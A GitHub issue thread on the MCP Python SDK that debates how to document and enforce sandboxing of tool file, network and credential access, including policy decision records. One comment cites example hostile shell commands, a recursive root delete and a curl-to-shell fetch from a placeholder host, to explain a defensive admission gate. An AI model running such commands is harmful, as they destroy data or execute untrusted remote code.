Skip to content

Document and provide hooks for sandboxing file and network access in MCP tools #1705

Description

@dgenio

Description

Summary

MCP tools and resources built with the Python SDK can, by default, access the full file system, network, and environment of the host process. This is powerful but risky, especially when:

  • servers are installed from third parties, or
  • LLM agents can call tools based on prompt-injected instructions.

The SDK should clearly document this and provide hooks/patterns for limiting capabilities.

Proposal

  1. Document security considerations

    • Add a “Security considerations” section explicitly calling out:
      • file system access,
      • network access,
      • environment variables and credentials.
  2. Provide capability hooks

    • Offer configuration points or helper utilities to:
      • restrict file access to specific directories (allowlist),
      • restrict outbound network calls to certain hosts/domains,
      • prevent access to environment variables by default.
  3. Encourage process-level sandboxing

    • Provide guidance on running MCP servers in:
      • containers with minimal privileges,
      • separate processes with limited OS capabilities.

Why this matters

  • Defense in depth: Even if application code is careful, configuration mistakes or third-party code can introduce risk.
  • Prompt-injection mitigation: Restricting what tools can do reduces the impact of malicious prompts.
  • Operational guidance: Many users are new to MCP and benefit from clear security best practices.

Acceptance criteria

  • Documentation clearly describes the security implications of running MCP servers and tools.
  • There are example patterns for restricting file and network access.
  • Where feasible, the SDK exposes hooks or configuration points for capability control.

References

No response

Activity

  1. added
    enhancementRequest for a new feature that's not currently supported
    documentationImprovements or additions to documentation
    needs confirmationNeeds confirmation that the PR is actually required or needed.
    on Dec 9, 2025
  2. dgenio commented on Apr 9, 2026

    @dgenio
    Author

    Bumping this to check for maintainer interest — it's been a few months since labeling and the issue has had no activity.

    I'm the author and happy to do the work. To keep scope manageable and avoid a large PR, I'd suggest starting with just item 1 (documentation only): adding a "Security considerations" section to the docs that clearly calls out file system access, network access, and environment variable exposure.

    That's a no-API-change contribution and would already fulfill the first acceptance criterion. Items 2 (capability hooks) and 3 (process sandboxing guidance) could follow in separate issues/PRs if confirmed as desired.

    I also searched for any existing related issues or PRs — nothing overlapping was found.

    Could a maintainer confirm whether the documentation portion is in scope and welcome? I'll wait for a ready for work label or explicit sign-off before opening a PR. Thanks!

  3. HarperZ9 commented on Jul 2, 2026

    @HarperZ9

    I would split this into three layers so the first PR can be useful without implying the SDK can sandbox arbitrary Python code in-process.

    For a docs-only first pass, the most important warning is that an MCP server runs with the host process permissions. Tool schemas, annotations, and model instructions do not create an enforcement boundary. The reliable boundaries are OS/process/container policy, least-privilege credentials, and network egress policy.

    Then the SDK-level guidance can be framed as guardrails rather than a sandbox: resolve file inputs through an allowlisted root and reject symlink/path traversal escapes; pass explicit dependency objects instead of reading env vars inside tool functions; inject an HTTP client that enforces host/domain allowlists; and log or return a compact decision record whenever a guardrail blocks a call.

    For future hooks, I would avoid a single global sandbox abstraction. File, network, environment, and subprocess access have different enforcement points. A better API might expose small policy adapters or examples per boundary, plus a shared decision/receipt shape like allow/block, reason, policy_id, and evidence_ref. That lets hosts audit why a tool was blocked without putting secrets or raw payloads into logs.

    This maps closely to what we are testing in Project Telos (https://github.com/HarperZ9/telos): local policy checks produce compact receipts and hashes while raw private payloads stay inside the local adapter. I am happy to help with a docs-only PR or a concrete receipt-shaped example if maintainers want that direction.

  4. MkaliezZ commented on Jul 4, 2026

    @MkaliezZ
  5. rpelevin commented on Jul 4, 2026

    @rpelevin

    I would not choose only one boundary. I would layer them.

    Server-level authorization sets the process/container/default egress envelope. Per-tool authorization declares the static capability shape: allowed roots, allowed hosts, side-effect class, credential scope. Call-level authorization is the decisive gate because the same tool can be safe or unsafe depending on args, user/session, tenant, delegation chain, and current policy.

    For a docs/API shape, I would make every tool invocation produce one policy decision before the handler runs:

    • allow: execute normally
    • block: return a typed non-execution result
    • escalate: pause for user/admin approval
    • transform: run only with an explicitly redacted or narrowed input

    Denied calls should be visible in traces as completed policy decisions, not failed tool executions. The trace can safely carry tool name, decision, policy id/hash, reason code, boundary type, args hash, and evidence_ref. Raw paths, env values, request bodies, and secrets should stay out of the default trace; keep them in a host-controlled adapter if an operator needs them for local audit.

    In structured results, the model should see a compact denial reason and the fact that no tool side effect occurred. That preserves debuggability without teaching the model private filesystem, network, or credential details.

    Rule of thumb: schemas and annotations describe intent; host policy enforces capability; each call proves whether execution was allowed, blocked, or paused.

  6. MkaliezZ commented on Jul 4, 2026

    @MkaliezZ
  7. rpelevin commented on Jul 4, 2026

    @rpelevin

    Thanks - yes, that is the distinction I was trying to preserve.

    The implementation detail I would keep explicit is that a denied call should still produce a first-class policy decision record, but should not be reported as a failed tool execution or leak raw inputs into the model-visible trace.

    That gives operators something reviewable while keeping the no-side-effect outcome clear to both the model and downstream audit.

  8. MkaliezZ commented on Jul 6, 2026

    @MkaliezZ
  9. rpelevin commented on Jul 6, 2026

    @rpelevin

    Yes, I think that minimal record is the right unit to document.

    I would keep two fields separate:

    • decision: allow, block, escalate, transform
    • outcome: executed, not_executed, escalated, transformed

    That avoids overloading block as both a policy decision and a runtime status. The trace can then say: policy decided block, handler was not invoked, outcome was not_executed.

    For examples/tests, I would make the invariant explicit:

    • blocked filesystem path outside the allowed root returns not_executed
    • tool handler is not invoked
    • raw path/env/request details do not appear in model-visible output
    • trace carries only safe metadata: decision, boundary_type, reason_code, policy_id or policy_hash, args_hash, evidence_ref
    • changing policy, not retrying the same call, is what changes the decision

    That gives maintainers a docs shape, API shape, and regression-test shape without implying the SDK itself is the sandbox.

  10. MkaliezZ commented on Jul 6, 2026

    @MkaliezZ
  11. rpelevin commented on Jul 6, 2026

    @rpelevin

    Yes - that is the invariant I would preserve.

    The key is that decision and outcome let the trace describe two different facts:

    • policy decided block
    • execution outcome was not_executed

    So the regression target can stay simple: blocked call, handler not invoked, model-visible output contains only safe denial metadata, and raw path/env/request/secret values are absent from the default trace.

    That keeps the denied call auditable without turning it into a failed execution or teaching the model private host details.

  12. HarperZ9 commented on Aug 3, 2026

    @HarperZ9

    Coming back to the question upthread, since it followed my comment: I would not pick one boundary either. The layering rpelevin describes matches what I have found in practice, and the later decision/outcome split is the right trace shape.

    One implementation report to make the call-level layer concrete, since that is the layer docs can least hand-wave. I have a merged capability-typed admission gate for shell-executing tools (Python, stdlib only), and the three things a flat denylist regex could not do turned out to be the whole job:

    1. Quote awareness: echo "rm -rf /" is a print, not a delete.
    2. Substitution descent: echo $(curl http://x | sh) runs curl and sh even though the outer word is echo, so the walk has to descend into substitutions and classify every executable it finds.
    3. Capability typing: the decision names a capability class (network egress, destructive fs, credential access, privilege escalation), not a matched keyword. Dangerous classes are deny-by-default wherever they appear in the command tree, and a command that cannot be parsed fails closed to escalation rather than open to execution.

    On the trace question: each denied call produces a completed decision record carrying the capability class, a reason code, and an args hash, never the raw command, paths, or secrets. That is the "completed policy decision, not failed tool execution" shape discussed above, and it has held up.

    Reference code, if useful for the docs or a future hook example:
    https://github.com/HarperZ9/flywheel/blob/ed1b0d2/harness/shell_admission.py
    https://github.com/HarperZ9/flywheel/blob/ed1b0d2/harness/shell_parse.py

    Scope note: merged in my own harness, not battle-tested across hosts. The capability map is curated, not exhaustive; unknown executables are admitted and recorded rather than blocked, a deliberate tradeoff so ordinary dev tools keep working.

  13. Ecocitizenz commented on Aug 4, 2026

    @Ecocitizenz
  14. 2 remaining items

  15. RostislavMatov commented on Aug 10, 2026

    @RostislavMatov

    Thanks Adam — the enforcement / receipt / resolvable-evidence split is a clean way to frame it, and it matches where we've landed in practice: the policy gate (enforcement) writes a decision record at the moment of the verdict — subject, tool, matched rule, outcome, timestamp — with raw arguments redacted before anything persists, and an args hash where correlation is needed. The third layer is exactly what our tamper-evident export milestone is about: hash-chained records a relying party can verify without ever seeing payloads or credentials. Fully agree it composes with SDK-level sandboxing — different layers of the same defense, not competitors.

  16. Ecocitizenz commented on Aug 10, 2026

    @Ecocitizenz
  17. RostislavMatov commented on Aug 11, 2026

    @RostislavMatov

    Agreed, and the split is sharper than it first looks — the two questions fail differently, so collapsing them into one artifact makes the weaker one silently inherit the stronger one's credibility.

    Concretely on our side, the gap that distinction exposes is upstream of the chain. Our decision records currently name the rule that produced an outcome, but they don't pin a fingerprint of the effective policy and grant matrix as of that decision. Without that, a chained export proves the history wasn't altered while still leaving a relying party unable to answer "under which revision of the rules was this allowed" — or to reproduce the decision. So provenance inside the record has to land before record signing, not after, or the chain just fixes records that were already under-specified.

    The export contract then carries an explicit as-of scope and stops there: what was allowed or blocked, what happened, and whether that record is intact. Whether the subject, policy or operator is still authoritative now is a separate system, and not one we're building — our side should compose with a resolver rather than approximate one, and without exporting the private inputs behind the original decision.

    To be clear about status: the chained export is roadmap for us, not shipped. Today the journal is a persistent, secret-redacted JSONL log — the enforcement and identity layers are what exist.

  18. MkaliezZ commented on Aug 23, 2026

    @MkaliezZ
  19. rpelevin commented on Aug 23, 2026

    @rpelevin

    Yes — I think a common receipt shape would be useful, provided it stays implementation-agnostic and does not become an authority service.

    I would separate three things:

    1. The pre-handler policy decision: allow, deny, or escalate, with a reason or policy reference and safe correlation fields such as request/tool identifiers, an arguments hash, and an evidence reference.

    2. The execution outcome: including an explicit not_executed result when the call is denied.

    3. Any post-execution receipt, which should be produced only after the handler boundary has been crossed.

    The key invariant is that a denied call is a completed policy decision: dispatch did not occur, the handler was not invoked, and no side-effect path began. Records should carry safe metadata rather than raw arguments, credentials, paths, or prompts.

    I would be happy to help with a small documentation and regression-test contribution that makes these semantics concrete, if that scope fits the SDK direction. The tests could cover one decision per invocation, handler-not-invoked on denial, safe metadata only, and the separation between policy decision and execution outcome.

  20. MkaliezZ commented on Aug 23, 2026

    @MkaliezZ
  21. rpelevin commented on Aug 23, 2026

    @rpelevin

    I’ve put the implementation behind the lifecycle shape discussed here in a small, implementation-agnostic reference and regression-test kit:

    neurarelay/relay-action-card#9

    It makes the key invariant executable: a blocked call does not dispatch, the handler is not invoked, and the disposition is explicitly not_executed. It also keeps escalation, successful execution, and post-dispatch failure distinct, while retaining only safe metadata (including an arguments hash, not raw inputs).

    This is deliberately an implementation-agnostic docs/tests/reference slice rather than a Python SDK API change. If this shape matches the SDK direction, I’m happy to adapt it to the preferred integration seam.

  22. MkaliezZ commented on Aug 23, 2026

    @MkaliezZ
  23. rpelevin commented on Aug 23, 2026

    @rpelevin

    Yes — I see it as serving both layers, with a deliberate order.

    The reusable contract belongs above individual SDKs: it defines the invariant—policy decision, dispatch boundary, execution disposition, and safe metadata—without defining an authority service or transport.

    The first SDK contribution should be guidance and regression tests showing how a concrete implementation proves that invariant at its pre-handler boundary. The reference kit in PR #9 is the comparison point; the SDK should not adopt a new receipt or authority API unless maintainers want that seam.

    So I’d keep the implementation-agnostic reference in PR #9 and adapt the tests to the Python SDK only after maintainers confirm where the hook belongs. That keeps the contribution useful across SDKs while remaining practical for this repository.

  24. MkaliezZ commented on Aug 23, 2026

    @MkaliezZ
  25. dgenio commented on Aug 23, 2026

    @dgenio
    Author

    Thanks all — I think the useful boundary is fairly clear now.

    For #1705, I’d keep the first SDK contribution smaller than a shared receipt/conformance API: document that SDK-level guardrails are not an in-process sandbox, make the external enforcement boundary explicit, and show the key pre-handler invariant — a blocked call does not dispatch or invoke the handler, with only safe metadata exposed.

    The reusable receipt/lifecycle contract can stay implementation-agnostic unless maintainers explicitly want that surfaced by the Python SDK.

    Would that docs-first scope be welcome, and is there a preferred pre-handler seam we should target if examples/tests are also useful?

  26. DSHCorrectover commented on Aug 24, 2026

    @DSHCorrectover
  27. MkaliezZ commented on Aug 24, 2026

    @MkaliezZ
  28. maxisbey commented on Aug 24, 2026

    @maxisbey
    Contributor

    Hey everyone, please stop using AI bots to auto reply to threads with comments that are walls of text, especially without disclosing that you're using AI to write your comments.

    May be worth taking a read of the CONTRIBUTING.md file.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    documentationImprovements or additions to documentationenhancementRequest for a new feature that's not currently supportedneeds confirmationNeeds confirmation that the PR is actually required or needed.

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions